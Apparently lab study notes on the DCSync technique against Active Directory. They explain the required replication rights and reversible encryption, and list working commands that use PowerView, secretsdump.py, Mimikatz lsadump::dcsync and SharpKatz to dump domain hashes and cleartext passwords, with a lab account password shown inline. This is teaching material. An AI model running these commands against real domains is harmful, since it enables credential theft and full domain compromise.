DCSync

DCSync is a technique for stealing the Active Directory password database by abusing the built-in **Directory Replication Service Remote Protocol (DRS, MS-DRSR)**, which Domain Controllers use to replicate domain data between themselves. An account that holds the replication extended rights on the domain object can ask a DC to "replicate" any account to it, password data included, so it reads the contents of NTDS.dit (every user's hashes) over the network without ever touching the file on disk.


  • Using Get-DomainUser to View adunn's Group Membership - SID

    Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl
  • Check which replication rights that SID holds on the domain object. DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the `Replication-Get` filter below matches every replication extended right, so read the ObjectAceType values in the output

    $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
    Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
    AceQualifier          : AccessAllowed
    ObjectDN              : DC=INLANEFREIGHT,DC=LOCAL
    ActiveDirectoryRights : ExtendedRight
    SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-1164
    ObjectAceType         : DS-Replication-Get-Changes-In-Filtered-Set
    
    AceQualifier          : AccessAllowed
    ObjectDN              : DC=INLANEFREIGHT,DC=LOCAL
    ActiveDirectoryRights : ExtendedRight
    SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-1164
    ObjectAceType         : DS-Replication-Get-Changes
  • Extracting NTLM Hashes and Kerberos Keys Using secretsdump.py

    secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 

    With -outputfile secretsdump writes three files: inlanefreight_hashes.ntds (NTLM hashes, one `domain\user:rid:lmhash:nthash:::` line per account), inlanefreight_hashes.ntds.kerberos (Kerberos keys, one line per key type) and inlanefreight_hashes.ntds.cleartext (plaintext passwords for accounts that use reversible encryption).

  • Reversible Encryption

    An account option (userAccountControl flag ENCRYPTED_TEXT_PWD_ALLOWED, decimal value 128) that stores the password in a reversibly encrypted form instead of a one-way hash. It is enabled when an application or service needs the user's plaintext password to authenticate (typically legacy protocols). Because the key material lives in the directory, anyone who can DCSync (or who has NTDS.dit plus the SYSTEM hive) recovers the plaintext password of such accounts, not just a hash.

  • Finding accounts with reversible encryption using Get-ADUser (bit 128 of userAccountControl is ENCRYPTED_TEXT_PWD_ALLOWED)

    Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
  • Checking for Reversible Encryption Option using Get-DomainUser

    Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
  • Displaying the Decrypted Password

    cat inlanefreight_hashes.ntds.cleartext 

    secretsdump decrypts the reversibly encrypted password and writes the cleartext value here. Only accounts flagged ENCRYPTED_TEXT_PWD_ALLOWED appear in this file; every other account yields hashes only.


Performing the DCSync Attack with Mimikatz

Mimikatz has to talk to the DC as adunn. runas /netonly starts a PowerShell whose network authentications use the supplied credentials while the local token stays the current user's, so Mimikatz launched from that window sends the replication request as adunn. Note that /netonly does not verify the password locally: a typo only shows up when the DC rejects the request.

Using runas.exe

The form shown here asks Mimikatz for one account at a time with /user: (lsadump::dcsync also accepts /all for every account, but secretsdump.py -just-dc is the usual choice for a full dump). privilege::debug is not needed for DCSync, which is a pure network request with no LSASS access, but it is harmless.

runas /netonly /user:INLANEFREIGHT\adunn powershell
(enter adunn's password at the prompt: SyncMaster757)
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Using SharpKatz (a C# port of the relevant Mimikatz modules). It is run from the same runas /netonly window and needs the target account, the domain and the DC; the values below are the ones used elsewhere on this page (DC address from the secretsdump step):

.\SharpKatz.exe --Command dcsync --User administrator --Domain INLANEFREIGHT.LOCAL --DomainController 172.16.5.5
